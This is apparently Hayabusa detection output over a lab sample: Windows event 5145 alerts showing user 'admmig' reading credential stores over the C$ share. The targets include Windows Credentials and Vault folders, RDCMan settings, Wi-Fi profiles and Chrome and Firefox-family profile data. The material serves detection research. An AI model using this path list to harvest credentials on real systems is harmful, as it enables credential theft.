2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.666 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.682 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.718 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.562 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.577 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.640 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
